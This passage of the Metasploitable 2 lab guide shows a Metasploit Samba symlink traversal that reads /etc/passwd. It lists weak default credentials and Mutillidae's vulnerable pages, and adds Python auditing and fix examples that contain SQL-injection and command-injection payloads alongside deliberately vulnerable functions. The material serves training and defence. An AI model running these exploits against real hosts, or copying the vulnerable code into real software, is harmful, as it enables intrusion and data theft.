msf auxiliary(samba_symlink_traversal) > exploit
[*] Connecting to the server...
[*] Trying to mount writeable share 'tmp'...
[*] Trying to link 'rootfs' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\192.168.99.131\tmp\rootfs\
msf auxiliary(samba_symlink_traversal) > exit

root@ubuntu:~# smbclient //192.168.99.131/tmp
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> cd rootfs
smb: \rootfs\> cd etc
smb: \rootfs\etc\> more passwd
getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[..]
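An smb.conf audit for the combination just described (a writeable share, reachable anonymously, on a server with "wide links" enabled), added here as an example that is not part of the Metasploitable guide. The smb.conf text is constructed to resemble the share listing above, not copied from the VM; `wide_links_default=True` follows the Samba 3.0.20 behaviour the guide states, while newer Samba releases default "wide links" to no.

```python
from __future__ import annotations

import configparser
from dataclasses import dataclass

TRUE_WORDS = {"yes", "true", "1", "on"}


def _flag(section, *names: str, default: bool) -> bool:
    """Read a boolean smb.conf option under any of its synonymous names."""
    for name in names:
        if name in section:
            return section[name].strip().lower() in TRUE_WORDS
    return default


@dataclass(frozen=True)
class ShareFinding:
    share: str
    path: str
    reasons: tuple[str, ...]


def audit_smb_conf(text: str, wide_links_default: bool = True) -> list[ShareFinding]:
    """Flag shares where a client could create a symlink that resolves outside the share."""
    cfg = configparser.ConfigParser(interpolation=None, strict=False)
    cfg.read_string(text)
    global_section = cfg["global"] if cfg.has_section("global") else {}
    global_wide = _flag(global_section, "wide links", default=wide_links_default)

    findings: list[ShareFinding] = []
    for share in cfg.sections():
        if share == "global":
            continue
        sec = cfg[share]
        # Shares are read-only unless "writeable"/"writable" is set or "read only = no".
        read_only = _flag(sec, "read only", default=True)
        writeable = _flag(sec, "writeable", "writable", default=not read_only)
        guest = _flag(sec, "guest ok", "public", default=False)
        wide = _flag(sec, "wide links", default=global_wide)   # share setting overrides global
        if not (writeable and wide):
            continue
        reasons = ["writeable share with wide links: symlinks can point outside the share"]
        if guest:
            reasons.append("reachable anonymously (guest ok)")
        findings.append(ShareFinding(share, sec.get("path", ""), tuple(reasons)))
    return findings


# Constructed smb.conf resembling the share listing above (not the VM's real file).
SAMPLE_SMB_CONF = """\
[global]
workgroup = WORKGROUP
server string = metasploitable server
; "wide links" is not set here, so the server default applies

[print$]
path = /var/lib/samba/printers
read only = yes

[tmp]
comment = oh noes!
path = /tmp
writeable = yes
guest ok = yes

[opt]
path = /opt
read only = yes
"""
```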

Weak Passwords

In addition to the more blatant backdoors and misconfigurations, Metasploitable 2 has terrible password security for both system and database server accounts. The primary administrative user msfadmin has a password matching the username. By discovering the list of users on this system, either by using another flaw to capture the passwd file or by enumerating these user IDs via Samba, a brute force attack can be used to quickly access multiple user accounts. At a minimum, the following weak system accounts are configured on the system.

Account name:password
  • msfadmin:msfadmin
  • user:user
  • postgres:postgres
  • sys:batman
  • klog:123456789
  • service:service

In addition to these system-level accounts, the PostgreSQL service can be accessed with username postgres and password postgres, while the MySQL service is open to username root with an empty password. The VNC service provides remote desktop access using the password password.

Vulnerable Web Services

Metasploitable 2 has deliberately vulnerable web applications pre-installed. The web server starts automatically when Metasploitable 2 is booted. To access the web applications, open a web browser and enter the URL http://<IP>, where <IP> is the IP address of Metasploitable 2. One way to accomplish this is to install Metasploitable 2 as a guest operating system in VirtualBox and change the network interface settings from “NAT” to “Host Only”. (Note: A video tutorial on installing Metasploitable 2 is available at the link .)

In this example, Metasploitable 2 is running at IP 192.168.56.101. Browsing to http://192.168.56.101/ shows the web application home page.

metasploitable-web-home-page.png

Note: 192.168.56.0/24 is the default “host only” network in VirtualBox. IP addresses are assigned starting from “101”. Depending on the order in which guest operating systems are started, the IP address of Metasploitable 2 will vary.

To access a particular web application, click on one of the links provided. Individual web applications may also be accessed by appending the application directory name to http://<IP>/ to form the URL http://<IP>/<application>/. For example, the Mutillidae application may be accessed (in this example) at http://192.168.56.101/mutillidae/. The applications are installed on Metasploitable 2 in the /var/www directory (list them with the command "ls /var/www"). In the current version as of this writing, the applications are:

mutillidae (NOWASP Mutillidae 2.1.19)
dvwa (Damn Vulnerable Web Application)
phpMyAdmin
tikiwiki (TikiWiki)
tikiwiki-old
dav (WebDav)

Vulnerable Web Services: Mutillidae

The Mutillidae web application (NOWASP Mutillidae) contains all of the vulnerabilities from the OWASP Top Ten plus a number of other vulnerabilities such as HTML5 web storage, forms caching, and click-jacking. Inspired by DVWA, Mutillidae allows the user to change the "Security Level" from 0 (completely insecure) to 5 (secure). Additionally, three levels of hints are provided, ranging from "Level 0 – I try harder" (no hints) to "Level 2 – noob" (maximum hints). If the application is damaged by user injections and hacks, clicking the "Reset DB" button resets the application to its original state.

Note: Tutorials on using Mutillidae are available at the webpwnized YouTube Channel.

[Image: mutillidae-home-page.png, the Mutillidae home page]

Enable hints in the application by clicking the "Toggle Hints" button on the menu bar:

[Image: mutillidae-tutorial.png, Mutillidae with hints enabled]

The Mutillidae application contains at least the following vulnerabilities on these respective pages:

add-to-your-blog.php
  - SQL injection on the blog entry
  - SQL injection on the logged-in user name
  - Cross-site scripting on the blog entry
  - Cross-site scripting on the logged-in user name
  - Log injection on the logged-in user name
  - CSRF
  - JavaScript validation bypass
  - XSS in the form title via the logged-in user name
  - The show-hints cookie can be changed by the user to enable hints even though they are not supposed to show in secure mode

arbitrary-file-inclusion.php
  - System file compromise
  - Load any page from any site

browser-info.php
  - XSS via the Referer HTTP header
  - JavaScript injection via the Referer HTTP header
  - XSS via the User-Agent HTTP header

capture-data.php
  - XSS via any GET, POST, or cookie parameter

captured-data.php
  - XSS via any GET, POST, or cookie parameter

config.inc*
  - Contains unencrypted database credentials

credits.php
  - Unvalidated redirects and forwards

dns-lookup.php
  - Cross-site scripting on the host/IP field
  - OS command injection on the host/IP field
  - This page writes to the log; SQL injection and XSS on the log are possible
  - GET for POST is possible because reading only POSTed variables is not enforced

footer.php*
  - Cross-site scripting via the HTTP_USER_AGENT HTTP header

framing.php
  - Click-jacking

header.php*
  - XSS via the logged-in user name and signature
  - The Setup/reset the DB menu item can be enabled by setting the uid cookie value to 1

html5-storage.php
  - DOM injection on the add-key error message, because the key entered is output into the error message without being encoded

index.php*
  - XSS of the hints-enabled output in the menu, because it takes input from the hints-enabled cookie value
  - SQL injection via the UID cookie value, because it is used to do a lookup
  - Rank can be changed to admin by altering the UID value
  - HTTP response splitting via the logged-in user name, because it is used to create an HTTP header
  - This page is responsible for cache-control but fails to do so
  - This page allows the X-Powered-By HTTP header
  - HTML comments
  - There are secret pages that, if browsed to, redirect the user to the phpinfo.php page; they can be found by brute forcing

log-visit.php
  - SQL injection and XSS via the Referer HTTP header
  - SQL injection and XSS via the User-Agent string

login.php
  - Authentication bypass SQL injection via the username field and password field
  - SQL injection via the username field and password field
  - XSS via the username field
  - JavaScript validation bypass

password-generator.php
  - JavaScript injection

pen-test-tool-lookup.php
  - JSON injection

phpinfo.php
  - This page gives away the PHP server configuration
  - Application path disclosure
  - Platform path disclosure

process-commands.php
  - Creates cookies but does not set the HttpOnly flag on them

process-login-attempt.php
  - Same as login.php; this is the action page

redirectandlog.php
  - Same as credits.php; this is the action page

register.php
  - SQL injection and XSS via the username, signature and password fields

rene-magritte.php
  - Click-jacking

robots.txt
  - Contains directories that are supposed to be private

secret-administrative-pages.php
  - This page gives hints about how to discover the server configuration

set-background-color.php
  - Cascading style sheet injection and XSS via the color field

show-log.php
  - Denial of service if you fill up the log
  - XSS via the hostname, client IP, browser HTTP header, Referer HTTP header, and date fields

site-footer-xss-discusson.php
  - XSS via the User-Agent HTTP header

source-viewer.php
  - Loading of any arbitrary file, including operating system files

text-file-viewer.php
  - Loading of any arbitrary web page on the Internet or locally, including the site's password files
  - Phishing

user-info.php
  - SQL injection to dump all usernames and passwords via the username field or the password field
  - XSS via any of the displayed fields (inject the XSS on the register.php page)
  - XSS via the username field

user-poll.php
  - Parameter pollution
  - GET for POST
  - XSS via the choice parameter
  - Cross-site request forgery to force the user's choice

view-someones-blog.php
  - XSS via any of the displayed fields; they are input on the add-to-your-blog page
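Two of the table's entries reproduced as vulnerable/fixed pairs, as an added example that is neither Mutillidae's PHP nor part of the Rapid7 guide: the login.php authentication bypass (input spliced into SQL text versus bound parameters) and the dns-lookup.php command injection (a shell string versus a validated argv element). SQLite stands in for Mutillidae's MySQL backend and `echo` for the DNS lookup binary so that it runs offline; the `accounts` table, its columns and the two accounts in it are assumptions made for the demo.

```python
"""The login.php SQL injection and the dns-lookup.php command injection from
the table above, reproduced in Python as a vulnerable/fixed pair each.

Added example; this is not Mutillidae's PHP and not part of the Rapid7 guide.
SQLite stands in for Mutillidae's MySQL backend and `echo` for the DNS
lookup binary so that the script runs offline; the `accounts` table, its
columns and the two accounts in it are assumptions made for the demo.
"""
import re
import sqlite3
import subprocess
from typing import Optional, Tuple


# ---- login.php: authentication bypass via SQL injection --------------------

def make_db() -> sqlite3.Connection:
    """Constructed in-memory accounts table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)",
                     [("admin", "adminpass", 1), ("bob", "bobpass", 0)])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str,
                     password: str) -> Optional[Tuple[str, int]]:
    """The classic bug: request parameters spliced into the SQL text, so a
    username such as  ' OR 1=1 --  rewrites the WHERE clause and the trailing
    comment discards the password check entirely."""
    query = ("SELECT username, is_admin FROM accounts "
             f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(query).fetchone()


def login_safe(conn: sqlite3.Connection, username: str,
               password: str) -> Optional[Tuple[str, int]]:
    """Same query with bound parameters: input is data to the driver, never SQL."""
    query = "SELECT username, is_admin FROM accounts WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


# ---- dns-lookup.php: OS command injection on the host/IP field -------------

def lookup_vulnerable(host: str) -> str:
    """Equivalent of shell_exec("nslookup " . $host): the value reaches a shell,
    so ';', '|', '&&', '$(...)' and backticks start further commands."""
    cmd = "echo resolving " + host  # echo stands in for the lookup binary
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


def is_valid_host(host: str) -> bool:
    """Allowlist for a hostname or IPv4 literal. The leading-dash check matters
    even without a shell: a '-' value would be parsed as an option by the lookup tool."""
    return bool(re.fullmatch(r"[A-Za-z0-9.-]{1,253}", host)) and not host.startswith("-")


def lookup_safe(host: str) -> str:
    """Validate, then pass the value as one argv element with no shell involved."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return subprocess.run(["echo", "resolving", host], capture_output=True, text=True).stdout


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "' OR 1=1 -- ", "anything"))  # ('admin', 1)
    print(login_safe(db, "' OR 1=1 -- ", "anything"))        # None
    print(lookup_vulnerable("localhost; echo INJECTED"), end="")  # second command runs
    try:
        lookup_safe("localhost; echo INJECTED")
    except ValueError as err:
        print(err)
```

`is_valid_host` rejects a leading dash as well as shell metacharacters: once the shell is out of the picture, option injection against the lookup binary is the remaining way to turn a hostname field into unintended behaviour, so an allowlist that only strips `;` and `|` is not enough.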

Vulnerable Web Services: DVWA

From the DVWA home page: “Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.”.

DVWA contains instructions on the home page and additional information is available at Wiki Pages – Damn Vulnerable Web App.

Default username = admin

Default password = password

[Image: dvwa.png, the DVWA home page]

Vulnerable Web Services: Information Disclosure

Additionally, an ill-advised PHP information disclosure page can be found at http://<IP>/phpinfo.php; in this example, the URL would be http://192.168.56.101/phpinfo.php. The phpinfo() information disclosure provides internal system information and service version information that can be used to look up vulnerabilities. For example, noting that the version of PHP disclosed in the screenshot is 5.2.4, the system may be vulnerable to CVE-2012-1823 (PHP-CGI query-string argument injection, affecting PHP before 5.3.12 and 5.4.x before 5.4.2) and the follow-up CVE-2012-2311. Two checks are worth making before trusting the version number alone: the bug is in the CGI SAPI, so the "Server API" line on the same phpinfo page tells you whether PHP is exposed to it at all, and distribution packages often backport fixes without changing the upstream version string, so the version is a lead to confirm, not a result.
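The version check from the paragraph above carried out in code, as an added example that is not from the Rapid7 guide: it reads the "PHP Version" and "Server API" fields out of a phpinfo() page in its text form and compares the version numerically against the CVE-2012-1823 ranges, which avoids the string-comparison mistake where "5.10" sorts before "5.9". The phpinfo fragment is constructed, not a capture from Metasploitable 2.

```python
"""Turning a phpinfo() version disclosure into a checked CVE range.

Added example, not from the Rapid7 guide. It pulls the fields a practitioner
needs from a phpinfo() page (the text form, as `php -i` prints it) and tests
the PHP version against the affected ranges of CVE-2012-1823 stated above.
The phpinfo fragment below is constructed, not a capture from Metasploitable 2.
"""
import re
from typing import Dict, Tuple

Version = Tuple[int, int, int]

# Constructed phpinfo() fragment in "Name => value" form (not a real capture).
SAMPLE_PHPINFO = """\
PHP Version => 5.2.4-2ubuntu5.10
System => Linux metasploitable 2.6.24-16-server #1 SMP i686
Server API => CGI/FastCGI
"""


def extract_field(phpinfo_text: str, field: str) -> str:
    """Return the value of a 'Field => value' line, or raise KeyError."""
    m = re.search(rf"^{re.escape(field)} => (.+)$", phpinfo_text, re.MULTILINE)
    if not m:
        raise KeyError(field)
    return m.group(1).strip()


def parse_version(text: str) -> Version:
    """'5.2.4-2ubuntu5.10' -> (5, 2, 4); only the upstream numeric prefix is compared."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unparseable PHP version: {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def affected_by_cve_2012_1823(version: Version) -> bool:
    """Upstream affected ranges: before 5.3.12, and 5.4.x before 5.4.2.
    Tuples compare numerically, so (5, 10, 0) correctly sorts after (5, 3, 12),
    which a plain string comparison gets wrong."""
    return version < (5, 3, 12) or (5, 4, 0) <= version < (5, 4, 2)


def assess(phpinfo_text: str) -> Dict[str, object]:
    """Version range plus the SAPI check that decides whether the range matters."""
    version = parse_version(extract_field(phpinfo_text, "PHP Version"))
    sapi = extract_field(phpinfo_text, "Server API")
    return {
        "version": version,
        "in_affected_range": affected_by_cve_2012_1823(version),
        # The bug lives in php-cgi; under mod_php the same version is not exposed.
        "cgi_sapi": "CGI" in sapi.upper(),
    }


if __name__ == "__main__":
    for key, value in assess(SAMPLE_PHPINFO).items():
        print(f"{key}: {value}")
```

A "distribution revision" suffix such as -2ubuntu5.10 is deliberately ignored by `parse_version`; it is exactly the part that may carry a backported fix, which is why a positive result here is a reason to test, not a finding on its own.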

You can download Metasploitable 2 VM from here